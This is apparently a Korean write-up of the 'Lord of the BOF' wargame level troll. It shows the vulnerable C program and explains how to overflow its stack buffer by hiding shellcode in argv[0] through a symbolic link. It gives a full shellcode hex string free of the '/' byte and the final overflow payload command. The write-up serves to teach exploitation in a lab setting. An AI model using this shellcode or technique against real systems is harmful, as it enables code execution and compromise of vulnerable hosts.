[LOB] orge -> troll

/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/
 
#include <stdio.h>
#include <stdlib.h>
 
extern char **environ;
 
main(int argc, char *argv[])
{
    char buffer[40];
    int i;
 
    // here is changed
    if(argc != 2){
        printf("argc must be two!\n");
        exit(0);
    }
 
    // egghunter 
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
 
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
 
    // check the length of argument
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }
 
    strcpy(buffer, argv[1]); 
    printf("%s\n", buffer);
 
        // buffer hunter
        memset(buffer, 0, 40);
 
    // one more!
    memset(argv[1], 0, strlen(argv[1]));
}
 

시작

처음 시작할 때 받는 인자수가 무조건 2개로 되게 제한사항이 생긴것 말고는 저번 문제와 같다.

.... 인줄 알았는데... argv[1]도 파괴해버리네 ㅡㅡ; 뭐 그래도 저런경우는 argv[0]을 이용해서 풀면 된다.

argv[0]은 프로그램 이름이고, 이것은 심볼링 링크를 통해 조작할 수 잇다.

쉘코드를 포함하는 이름으로 프로그램에 링크를 걸고 공격하면 되겟다.

여기서 주의할 점은 쉘코드가 \x2f를 포함하며 안된다는것... \x2f는  '/'값으로 파일명으로는 쓸수 없다...

(정 쓰고 싶다면 \x2f를 만날때마다 폴더를 만들어서 끓어쓰면 된다.)

x2f : / 표시없는 쉘코드

\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6

이걸로 심볼릭 링크를 걸자

잘걸렸다. 이제 argv[0]의 주소를 알아내자.

저기에 있다.

이제 공격하면 된다.

payload : ./`python -c 'print("\x90")'`*  `python -c 'print("A"*44+"\x1f\xfc\xff\xbf")'`

클리어